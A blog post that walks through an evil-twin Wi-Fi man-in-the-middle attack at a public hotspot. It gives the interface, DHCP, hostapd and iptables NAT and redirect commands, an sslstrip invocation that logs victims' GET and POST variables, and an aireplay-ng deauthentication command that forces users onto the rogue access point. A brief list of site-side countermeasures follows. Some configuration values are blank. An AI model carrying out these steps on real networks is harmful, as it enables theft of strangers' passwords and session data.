Unless you know enough about security to know what’s going on behind the scenes, Wifi is beyond insecure. Even with SSL as an attempt to secure a web connection, your connection is still fundamentally insecure. This is an explanation of how someone would capture passwords and other variables sent over an SSL connection that uses Wifi. In essence, its a Man in the Middle (MiM) attack over Wifi that modifies the victim’s HTTP connection and thus gathers GET and POST variables. I was not the first to create it, but I independently thought of it and then combined a few techniques together.

Here’s how it works:

Lets say you go to a Starbucks and they offer an open Wifi connection. Suppose the AP name is attwifi. First, the attacker connects his computer to the legitimate AP so that he can go online. The attacker can use a separate means to get online, I just find this most convenient.

Using a second wifi card that can go into Master mode, set the IP address to something the legitimate Wifi network does not use. No one uses, so when I was testing this I used that. Since the attacker’s machine will balance between the legitimate AP and fake AP, it needs to be able to distinguish between the two and prevent collisions. So works great.

ifconfig wlan0
ifconfig wlan0 up

Then, the attacker must configure dhcpd, in my case, located in /etc/dhcp/dhcpd.conf:

subnet netmask {
	option domain-name-server;
	option routers;

On the second wifi card the attacker must then create an AP by the same name as the legitimate AP. Most public APs are Open networks without any encryption or anything. But even if they weren’t open, the host would likely just give you the password upon request. To create an open network, the attacker must set the following settings in /etc/hostapd/hostapd.conf:


Finally, start to turn stuff on. First, the layer 3 routing and NAT rules:

echo 1 > /proc/net/ipv4/ip_forward # Allows routing
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Turns on NAT
iptables -A FORWARD -j ACCEPT # Accepts everything

Then turn on dhcpd:


Then I start broadcasting the Access Point:

hostapd /etc/hostapd/hostapd.conf

At this point, anyone who connects to attwifi will either connect to the attacker, or the authentic AP. As of now it makes no difference who they connect through. If they connect through the attacker’s AP, they will just be forwarded through the real attwifi AP anyways with a unnoticed extra hop.

Up to this point you’ve simply done a Man in the Middle (MiM). The final step is where the magic lays. The attacker must redirect connects to port 80 through sslstrip, a tool that intercepts a victim’s web requests, and removes all references of SSL (ie, changes ‘https’ to ‘http’) and logs all relevant variables that are passed over. For the record and so that I don’t come across as a complete script kiddie, I wrote a tool similar to sslstrip, but sslstrip is significantly better and cleaner written.

The attacker would do this:

iptables -t nat -A PREROUTING -p tcp -s --dport 80 -j DNAT --to-destination
python ./ -w attwifi.log -l 31337

At this point, the attacker’s machine will be logging GET and POST variables directed through his machine, even if the connection was intended to be secured with SSL. The only sign the victim may notice is that his usually SSL-encrypted connection is no longer secure. A savvy user might notice this, but the vast majority will not. In fact, the way most sites are written, such as Facebook, you enter your credentials onto an initial insecure page! While the form‘s GET or POST target is secure, the page you received is certainly not. Unless he checks the initial page’s code, he would never know that his connection is being tampered with.

There’s one final optional step. A client might be connected to the correct AP for hours without any reason to disconnect. With Windows, if there are multiple APs by the same name and the user is experiencing connection issues on one, Windows will automatically switch to the other AP. You can break a user’s connection and force him to connect through you using the following command:

aireplay-ng -0 0 -a 00:AA:BB:CC:DD:EE -c 01:12:34:56:78:9A ath0

Where 00:AA:BB:CC:DD:EE is the access point and 01:12:34:56:78:9A is a client. This last step is particularly insidious.

The fundamental issue here is not a weakness in SSL, but in Wifi that allows for an easy MiM. However, there are some steps a web site can take to help fix the problem:

  1. Require users to go to instead of A simple redirection or link will not do, as sslstrip and similar programs can capture the redirection-attempt.
  2. Javascript code that does client-side verification to scan for for page modifications
  3. Two-factor authentication, such as an RSA token. While this will not stop the attacker from capturing your variables, it makes re-authentication as the victim impossible. Also a great solution, but won’t prevent against data leakage.
  4. Have the user click a link that requests login. Once at the new page, have an image pointing up at the URL bar and asking the user to verify if SSL is being used. But, this requires too much user-verification.
  5. Change the port from 80 to 8080, or so, thus temporarily thwarting the iptables rule. But obviously a broader or more focused iptables rule would counter-thwart that.

Your thoughts…?

I doubt I have to legally add a disclaimer, but I’ll do it anyways… don’t do anything illegal! You are responsible for your own actions!